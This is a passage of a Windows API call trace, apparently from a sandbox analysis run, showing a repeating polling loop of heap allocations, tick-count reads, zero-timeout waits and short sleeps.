lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.314] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.314] GetTickCount () returned 0x20ec3d7 [0188.314] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.314] GetTickCount () returned 0x20ec3d7 [0188.314] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.314] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0188.314] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.316] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.318] GetTickCount () returned 0x20ecc6d [0188.318] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bb0 [0188.318] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.318] GetTickCount () returned 0x20ecc6d [0188.318] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.318] GetTickCount () returned 0x20ecc6d [0188.318] GetTickCount () returned 0x20ecc6d [0188.318] GetTickCount () returned 0x20ecc6d [0188.318] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.318] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.318] GetTickCount () returned 0x20ecc6d [0188.318] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.318] GetTickCount () returned 0x20ecc6d [0188.318] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.318] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bb0 | out: hHeap=0x2150000) returned 1 [0188.318] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.320] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.321] GetTickCount () returned 0x20ed512 [0188.321] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64cb0 [0188.321] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.321] GetTickCount () returned 0x20ed512 [0188.321] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.321] GetTickCount () returned 0x20ed512 [0188.321] GetTickCount () returned 0x20ed512 [0188.321] GetTickCount () returned 0x20ed512 [0188.321] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.321] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.321] GetTickCount () returned 0x20ed512 [0188.321] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.321] GetTickCount () returned 0x20ed512 [0188.322] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.322] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64cb0 | out: hHeap=0x2150000) returned 1 [0188.322] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.323] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.327] GetTickCount () returned 0x20edda8 [0188.327] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64cb0 [0188.327] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.327] GetTickCount () returned 0x20edda8 [0188.327] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.327] GetTickCount () returned 0x20edda8 [0188.327] GetTickCount () returned 0x20edda8 [0188.327] GetTickCount () returned 0x20edda8 [0188.327] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.327] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.327] GetTickCount () returned 0x20edda8 [0188.327] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.327] GetTickCount () returned 0x20edda8 [0188.327] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.327] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64cb0 | out: hHeap=0x2150000) returned 1 [0188.327] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.329] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.330] GetTickCount () returned 0x20ee63e [0188.330] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0188.330] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.330] GetTickCount () returned 0x20ee63e [0188.330] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.330] GetTickCount () returned 0x20ee63e [0188.330] GetTickCount () returned 0x20ee63e [0188.330] GetTickCount () returned 0x20ee63e [0188.330] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.330] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.330] GetTickCount () returned 0x20ee63e [0188.330] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.330] GetTickCount () returned 0x20ee63e [0188.330] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.331] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0188.331] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.332] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.334] GetTickCount () returned 0x20eeed4 [0188.334] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64af0 [0188.334] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.334] GetTickCount () returned 0x20eeed4 [0188.334] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.334] GetTickCount () returned 0x20eeed4 [0188.334] GetTickCount () returned 0x20eeed4 [0188.334] GetTickCount () returned 0x20eeed4 [0188.334] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.334] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.334] GetTickCount () returned 0x20eeed4 [0188.334] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.334] GetTickCount () returned 0x20eeed4 [0188.334] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.334] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64af0 | out: hHeap=0x2150000) returned 1 [0188.334] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.336] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.343] GetTickCount () returned 0x20ef77a [0188.343] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64df0 [0188.343] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.343] GetTickCount () returned 0x20ef77a [0188.343] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.343] GetTickCount () returned 0x20ef77a [0188.343] GetTickCount () returned 0x20ef77a [0188.343] GetTickCount () returned 0x20ef77a [0188.343] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.343] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.343] GetTickCount () returned 0x20ef77a [0188.343] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.343] GetTickCount () returned 0x20ef77a [0188.343] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.343] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64df0 | out: hHeap=0x2150000) returned 1 [0188.343] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.345] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.346] GetTickCount () returned 0x20f0010 [0188.346] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c70 [0188.346] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.346] GetTickCount () returned 0x20f0010 [0188.346] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.346] GetTickCount () returned 0x20f0010 [0188.346] GetTickCount () returned 0x20f0010 [0188.346] GetTickCount () returned 0x20f0010 [0188.346] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.346] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.346] GetTickCount () returned 0x20f0010 [0188.346] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.346] GetTickCount () returned 0x20f0010 [0188.346] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.347] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c70 | out: hHeap=0x2150000) returned 1 [0188.347] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.348] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.350] GetTickCount () returned 0x20f08a6 [0188.350] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e70 [0188.350] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.350] GetTickCount () returned 0x20f08a6 [0188.350] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.350] GetTickCount () returned 0x20f08a6 [0188.350] GetTickCount () returned 0x20f08a6 [0188.350] GetTickCount () returned 0x20f08a6 [0188.350] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.350] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.350] GetTickCount () returned 0x20f08a6 [0188.350] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.350] GetTickCount () returned 0x20f08a6 [0188.350] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.350] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e70 | out: hHeap=0x2150000) returned 1 [0188.351] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.352] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.354] GetTickCount () returned 0x20f114b [0188.354] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e651f0 [0188.354] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.354] GetTickCount () returned 0x20f114b [0188.354] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.354] GetTickCount () returned 0x20f114b [0188.354] GetTickCount () returned 0x20f114b [0188.354] GetTickCount () returned 0x20f114b [0188.354] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.354] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.354] GetTickCount () returned 0x20f114b [0188.354] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.354] GetTickCount () returned 0x20f114b [0188.354] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.354] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e651f0 | out: hHeap=0x2150000) returned 1 [0188.354] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.356] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.359] GetTickCount () returned 0x20f19e1 [0188.359] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64db0 [0188.359] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.359] GetTickCount () returned 0x20f19e1 [0188.359] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.359] GetTickCount () returned 0x20f19e1 [0188.359] GetTickCount () returned 0x20f19e1 [0188.359] GetTickCount () returned 0x20f19e1 [0188.359] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.359] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.359] GetTickCount () returned 0x20f19e1 [0188.359] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.359] GetTickCount () returned 0x20f19e1 [0188.359] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.359] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64db0 | out: hHeap=0x2150000) returned 1 [0188.359] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.361] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.362] GetTickCount () returned 0x20f2277 [0188.362] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64d30 [0188.362] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.362] GetTickCount () returned 0x20f2277 [0188.362] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.362] GetTickCount () returned 0x20f2277 [0188.362] GetTickCount () returned 0x20f2277 [0188.362] GetTickCount () returned 0x20f2277 [0188.362] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.362] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.362] GetTickCount () returned 0x20f2277 [0188.362] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.362] GetTickCount () returned 0x20f2277 [0188.362] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.363] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64d30 | out: hHeap=0x2150000) returned 1 [0188.363] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.364] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.366] GetTickCount () returned 0x20f2b0d [0188.366] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64bb0 [0188.366] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.366] GetTickCount () returned 0x20f2b0d [0188.366] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.366] GetTickCount () returned 0x20f2b0d [0188.366] GetTickCount () returned 0x20f2b0d [0188.366] GetTickCount () returned 0x20f2b0d [0188.366] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.366] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.366] GetTickCount () returned 0x20f2b0d [0188.366] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.366] GetTickCount () returned 0x20f2b0d [0188.366] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.366] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64bb0 | out: hHeap=0x2150000) returned 1 [0188.366] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.368] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.375] GetTickCount () returned 0x20f33b3 [0188.375] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64eb0 [0188.375] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.375] GetTickCount () returned 0x20f33b3 [0188.375] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.375] GetTickCount () returned 0x20f33b3 [0188.375] GetTickCount () returned 0x20f33b3 [0188.375] GetTickCount () returned 0x20f33b3 [0188.375] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.375] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.375] GetTickCount () returned 0x20f33b3 [0188.375] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.375] GetTickCount () returned 0x20f33b3 [0188.375] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.375] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64eb0 | out: hHeap=0x2150000) returned 1 [0188.375] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.377] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.378] GetTickCount () returned 0x20f3c49 [0188.378] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64fb0 [0188.378] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.378] GetTickCount () returned 0x20f3c49 [0188.378] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.378] GetTickCount () returned 0x20f3c49 [0188.378] GetTickCount () returned 0x20f3c49 [0188.378] GetTickCount () returned 0x20f3c49 [0188.378] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.378] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.378] GetTickCount () returned 0x20f3c49 [0188.378] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.378] GetTickCount () returned 0x20f3c49 [0188.378] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.378] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64fb0 | out: hHeap=0x2150000) returned 1 [0188.378] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.380] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.382] GetTickCount () returned 0x20f44ef [0188.382] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64af0 [0188.382] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.382] GetTickCount () returned 0x20f44ef [0188.382] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.382] GetTickCount () returned 0x20f44ef [0188.382] GetTickCount () returned 0x20f44ef [0188.382] GetTickCount () returned 0x20f44ef [0188.382] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.382] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.382] GetTickCount () returned 0x20f44ef [0188.382] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.383] GetTickCount () returned 0x20f44ef [0188.383] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.383] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64af0 | out: hHeap=0x2150000) returned 1 [0188.383] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.384] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.386] GetTickCount () returned 0x20f4d85 [0188.386] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c70 [0188.386] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.386] GetTickCount () returned 0x20f4d85 [0188.386] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.386] GetTickCount () returned 0x20f4d85 [0188.386] GetTickCount () returned 0x20f4d85 [0188.386] GetTickCount () returned 0x20f4d85 [0188.386] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.386] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.386] GetTickCount () returned 0x20f4d85 [0188.386] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.386] GetTickCount () returned 0x20f4d85 [0188.386] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.386] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c70 | out: hHeap=0x2150000) returned 1 [0188.386] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.388] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.390] GetTickCount () returned 0x20f561b [0188.390] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65230 [0188.390] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.390] GetTickCount () returned 0x20f561b [0188.390] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.390] GetTickCount () returned 0x20f561b [0188.391] GetTickCount () returned 0x20f561b [0188.391] GetTickCount () returned 0x20f561b [0188.391] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.391] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.391] GetTickCount () returned 0x20f561b [0188.391] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.391] GetTickCount () returned 0x20f561b [0188.391] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.391] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65230 | out: hHeap=0x2150000) returned 1 [0188.391] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.393] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.394] GetTickCount () returned 0x20f5eb1 [0188.394] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64d30 [0188.394] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.394] GetTickCount () returned 0x20f5eb1 [0188.394] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.394] GetTickCount () returned 0x20f5eb1 [0188.394] GetTickCount () returned 0x20f5eb1 [0188.394] GetTickCount () returned 0x20f5eb1 [0188.394] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.394] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.394] GetTickCount () returned 0x20f5eb1 [0188.394] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.394] GetTickCount () returned 0x20f5eb1 [0188.394] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.394] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64d30 | out: hHeap=0x2150000) returned 1 [0188.394] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.396] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.398] GetTickCount () returned 0x20f6756 [0188.398] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65070 [0188.398] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.398] GetTickCount () returned 0x20f6756 [0188.398] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.398] GetTickCount () returned 0x20f6756 [0188.398] GetTickCount () returned 0x20f6756 [0188.398] GetTickCount () returned 0x20f6756 [0188.398] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.398] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.398] GetTickCount () returned 0x20f6756 [0188.398] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.398] GetTickCount () returned 0x20f6756 [0188.398] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.398] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65070 | out: hHeap=0x2150000) returned 1 [0188.398] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.400] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.401] GetTickCount () returned 0x20f6fec [0188.401] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64af0 [0188.401] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.401] GetTickCount () returned 0x20f6fec [0188.401] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.401] GetTickCount () returned 0x20f6fec [0188.401] GetTickCount () returned 0x20f6fec [0188.401] GetTickCount () returned 0x20f6fec [0188.401] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.401] WaitForSingleObject (hHandle=0x790, dwMilliseconds=0x0) returned 0x0 [0188.401] GetTickCount () returned 0x20f6fec [0188.401] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.401] GetTickCount () returned 0x20f6fec [0188.401] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: hHeap=0x2150000) returned 1 [0188.401] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64af0 | out: hHeap=0x2150000) returned 1 [0188.402] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.409] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0188.410] GetTickCount () returned 0x20f7882 [0188.410] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64e30 [0188.410] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0x0) returned 0x0 [0188.410] GetTickCount () returned 0x20f7882 [0188.410] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0188.410] GetTickCount () returned 0x20f7882 [0188.410] GetTickCount () returned 0x20f7882 [0188.410] GetTickCount () returned 0x20f7882 [0188.410] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e80460 | out: 